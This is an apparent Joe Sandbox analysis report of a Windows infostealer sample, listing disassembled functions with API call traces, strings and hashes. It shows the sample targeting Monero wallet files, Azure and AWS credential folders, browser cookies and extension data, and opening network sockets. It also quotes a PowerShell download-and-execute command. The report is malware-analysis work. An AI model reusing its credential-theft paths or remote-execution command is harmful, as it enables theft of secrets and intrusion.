                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 009012FF
                        • lstrlen.KERNEL32(015EE368), ref: 0090130E
                        • lstrcpy.KERNEL32(00000000,?), ref: 00901335
                        • lstrcat.KERNEL32(00000000,?), ref: 0090133D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00901378
                        • lstrcat.KERNEL32(00000000), ref: 00901385
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009013AC
                        • CopyFileA.KERNEL32(?,?,00000001), ref: 009013D5
                        • lstrcpy.KERNEL32(00000000,?), ref: 00901401
                        • lstrcpy.KERNEL32(00000000,?), ref: 0090143D
                          • Part of subcall function 0091EDE0: lstrcpy.KERNEL32(00000000,?), ref: 0091EE12
                        • DeleteFileA.KERNEL32(?), ref: 00901471
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                        • String ID: .keys$\Monero\wallet.keys
                        • API String ID: 2881711868-3586502688
                        • Opcode ID: 381aac33f2dcfc588f2b0cf7ef7996540cf8641a2b80ec0d3e6cd0de826b2e4b
                        • Instruction ID: d09ebf5d77fb5e9ebde4a428887acfa0e78efab1d4b2955fc83150e45aa864e3
                        • Opcode Fuzzy Hash: 381aac33f2dcfc588f2b0cf7ef7996540cf8641a2b80ec0d3e6cd0de826b2e4b
                        • Instruction Fuzzy Hash: 8EA15C71A11606AFCB21EBB8DE89BAE77B9AF84300F144424F915E72D1DF34ED458B90
                        Function 0091E720 Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 199stringCOMMON
                        Download Yara Rule
                        APIs
                        • memset.MSVCRT ref: 0091E740
                        • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 0091E769
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091E79F
                        • lstrcat.KERNEL32(?,00000000), ref: 0091E7AD
                        • lstrcat.KERNEL32(?,\.azure\), ref: 0091E7C6
                        • memset.MSVCRT ref: 0091E805
                        • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 0091E82D
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091E85F
                        • lstrcat.KERNEL32(?,00000000), ref: 0091E86D
                        • lstrcat.KERNEL32(?,\.aws\), ref: 0091E886
                        • memset.MSVCRT ref: 0091E8C5
                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0091E8F1
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091E920
                        • lstrcat.KERNEL32(?,00000000), ref: 0091E92E
                        • lstrcat.KERNEL32(?,\.IdentityService\), ref: 0091E947
                        • memset.MSVCRT ref: 0091E986
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$memset$FolderPathlstrcpy
                        • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                        • API String ID: 4067350539-3645552435
                        • Opcode ID: 7bb75aac6f8e5d01a8697a2168243b223a9ac16e6c0026bee2d75d27d1462410
                        • Instruction ID: 09df0aea6e6c70c28c34970106388cd45963fd479e5fdbc9bf7fd6b490cb592a
                        • Opcode Fuzzy Hash: 7bb75aac6f8e5d01a8697a2168243b223a9ac16e6c0026bee2d75d27d1462410
                        • Instruction Fuzzy Hash: 6F71E971B4021CAFDB25EB64DC4AFED7378AF88700F540494B719AB1C0DEB0AE888B54
                        Function 0091ABB2 Relevance: 39.3, APIs: 25, Strings: 1, Instructions: 297stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32 ref: 0091ABCF
                        • lstrlen.KERNEL32(015EFE68), ref: 0091ABE5
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091AC0D
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0091AC18
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091AC41
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091AC84
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0091AC8E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091ACB7
                        • lstrlen.KERNEL32(00934AD4), ref: 0091ACD1
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091ACF3
                        • lstrcat.KERNEL32(00000000,00934AD4), ref: 0091ACFF
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091AD28
                        • lstrlen.KERNEL32(00934AD4), ref: 0091AD3A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091AD5C
                        • lstrcat.KERNEL32(00000000,00934AD4), ref: 0091AD68
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091AD91
                        • lstrlen.KERNEL32(015EFE80), ref: 0091ADA7
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091ADCF
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0091ADDA
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091AE03
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091AE3F
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0091AE49
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091AE6F
                        • lstrlen.KERNEL32(00000000), ref: 0091AE85
                        • lstrcpy.KERNEL32(00000000,015EFF40), ref: 0091AEB8
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen
                        • String ID: f
                        • API String ID: 2762123234-1993550816
                        • Opcode ID: 4b955181100c7782ae541bb9ada3819616a05384c09cc0722f0f9a8faa13ccb6
                        • Instruction ID: 79d4fe55e85cabd4585a7d2e8e34569fa8b3b7a1629ba945b7b2664eba49e1b2
                        • Opcode Fuzzy Hash: 4b955181100c7782ae541bb9ada3819616a05384c09cc0722f0f9a8faa13ccb6
                        • Instruction Fuzzy Hash: 00B15E30A1261A9FCB22EB68DD4DBAFB7B9AF80301F140524F815A7291DF74DD45CB91
                        Function 009247E0 Relevance: 38.5, APIs: 11, Strings: 11, Instructions: 48libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNEL32(ws2_32.dll,?,009172A4), ref: 009247E6
                        • GetProcAddress.KERNEL32(00000000,connect), ref: 009247FC
                        • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 0092480D
                        • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0092481E
                        • GetProcAddress.KERNEL32(00000000,htons), ref: 0092482F
                        • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 00924840
                        • GetProcAddress.KERNEL32(00000000,recv), ref: 00924851
                        • GetProcAddress.KERNEL32(00000000,socket), ref: 00924862
                        • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 00924873
                        • GetProcAddress.KERNEL32(00000000,closesocket), ref: 00924884
                        • GetProcAddress.KERNEL32(00000000,send), ref: 00924895
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                        • API String ID: 2238633743-3087812094
                        • Opcode ID: c2eb248b7d329515131fb39b6e39586daa69dfbf00156a562fb130dba16e60f6
                        • Instruction ID: bc2be4afb4939c3d3adf2d16db0d9ff5b86129ab6f6defaffbe00b337065a6bf
                        • Opcode Fuzzy Hash: c2eb248b7d329515131fb39b6e39586daa69dfbf00156a562fb130dba16e60f6
                        • Instruction Fuzzy Hash: B71105769A6730AFC7249FF9AD0DA5E3AB8BA4D70A725081AF051D3160DFF48404DF91
                        Function 0091BE20 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 203stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0091BE53
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0091BE86
                        • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 0091BE91
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091BEB1
                        • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 0091BEBD
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091BEE0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0091BEEB
                        • lstrlen.KERNEL32(')"), ref: 0091BEF6
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091BF13
                        • lstrcat.KERNEL32(00000000,')"), ref: 0091BF1F
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091BF46
                        • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 0091BF66
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091BF88
                        • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 0091BF94
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091BFBA
                        • ShellExecuteEx.SHELL32(?), ref: 0091C00C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                        • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        • API String ID: 4016326548-898575020
                        • Opcode ID: eecef2e952f656a18e7c74fbab04d8047c2336428c0346ba2bb9ae474ae04403
                        • Instruction ID: ad8fcdc21025d8ec6a654780343929e5375a47378297c1cb80c71e4a5c3556f6
                        • Opcode Fuzzy Hash: eecef2e952f656a18e7c74fbab04d8047c2336428c0346ba2bb9ae474ae04403
                        • Instruction Fuzzy Hash: F761A171B1061AAFCB21BFB99D8D6EF7BA9AF84300F140429F505E3291DF34D9468B91
                        Function 00921820 Relevance: 31.5, APIs: 25, Instructions: 269stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0092184F
                        • lstrlen.KERNEL32(015D7010), ref: 00921860
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00921887
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00921892
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009218C1
                        • lstrlen.KERNEL32(00934FA0), ref: 009218D3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009218F4
                        • lstrcat.KERNEL32(00000000,00934FA0), ref: 00921900
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0092192F
                        • lstrlen.KERNEL32(015D7030), ref: 00921945
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0092196C
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00921977
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009219A6
                        • lstrlen.KERNEL32(00934FA0), ref: 009219B8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009219D9
                        • lstrcat.KERNEL32(00000000,00934FA0), ref: 009219E5
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00921A14
                        • lstrlen.KERNEL32(015D70A0), ref: 00921A2A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00921A51
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00921A5C
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00921A8B
                        • lstrlen.KERNEL32(015D7040), ref: 00921AA1
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00921AC8
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00921AD3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00921B02
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcatlstrlen
                        • String ID:
                        • API String ID: 1049500425-0
                        • Opcode ID: cafe9efc57ecfc607a16ba3486a27b29de92ac9aa5424c842226b04cb7e4ccb0
                        • Instruction ID: b1e0e7b1b8b4aa52ff6660005f84b066060bb65079d8585481d754d49a995112
                        • Opcode Fuzzy Hash: cafe9efc57ecfc607a16ba3486a27b29de92ac9aa5424c842226b04cb7e4ccb0
                        • Instruction Fuzzy Hash: FD913175601713AFDB209FB9ED88A1AB7ECEF54300F244828B896D3295DF74E855CB50
                        Function 00914760 Relevance: 30.3, APIs: 18, Strings: 2, Instructions: 309stringmemoryCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,?), ref: 00914793
                        • LocalAlloc.KERNEL32(00000040,?), ref: 009147C5
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00914812
                        • lstrlen.KERNEL32(00934B60), ref: 0091481D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091483A
                        • lstrcat.KERNEL32(00000000,00934B60), ref: 00914846
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0091486B
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00914898
                        • lstrcat.KERNEL32(00000000,00000000), ref: 009148A3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009148CA
                        • StrStrA.SHLWAPI(?,00000000), ref: 009148DC
                        • lstrlen.KERNEL32(?), ref: 009148F0
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 00914931
                        • lstrcpy.KERNEL32(00000000,?), ref: 009149B8
                        • lstrcpy.KERNEL32(00000000,?), ref: 009149E1
                        • lstrcpy.KERNEL32(00000000,?), ref: 00914A0A
                        • lstrcpy.KERNEL32(00000000,?), ref: 00914A30
                        • lstrcpy.KERNEL32(00000000,?), ref: 00914A5D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                        • String ID: ^userContextId=4294967295$moz-extension+++
                        • API String ID: 4107348322-3310892237
                        • Opcode ID: b50a5efc33efd42250903e6a308e1d13e2d4ac69198e318d5a9150bf7a9049b4
                        • Instruction ID: 9ed91c8a9d3ed75b3616be02f70f6bbec4f03a1cc210a272573990ddae2975b3
                        • Opcode Fuzzy Hash: b50a5efc33efd42250903e6a308e1d13e2d4ac69198e318d5a9150bf7a9049b4
                        • Instruction Fuzzy Hash: E9B1C571B1160A9FCB21EF78D989ADF77B9AF88700F154428F856A7291DF30EC458B90
                        Function 009092B0 Relevance: 27.4, APIs: 13, Strings: 5, Instructions: 369stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 009090C0: InternetOpenA.WININET(0092CFEC,00000001,00000000,00000000,00000000), ref: 009090DF
                          • Part of subcall function 009090C0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 009090FC
                          • Part of subcall function 009090C0: InternetCloseHandle.WININET(00000000), ref: 00909109
                        • strlen.MSVCRT ref: 009092E1
                        • strlen.MSVCRT ref: 009092FA
                          • Part of subcall function 00908980: std::_Xinvalid_argument.LIBCPMT ref: 00908996
                        • strlen.MSVCRT ref: 00909399
                        • strlen.MSVCRT ref: 009093E6
                        • lstrcat.KERNEL32(?,cookies), ref: 00909547
                        • lstrcat.KERNEL32(?,00931794), ref: 00909559
                        • lstrcat.KERNEL32(?,?), ref: 0090956A
                        • lstrcat.KERNEL32(?,00934B98), ref: 0090957C
                        • lstrcat.KERNEL32(?,?), ref: 0090958D
                        • lstrcat.KERNEL32(?,.txt), ref: 0090959F
                        • lstrlen.KERNEL32(?), ref: 009095B6
                        • lstrlen.KERNEL32(?), ref: 009095DB
                        • lstrcpy.KERNEL32(00000000,?), ref: 00909614
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
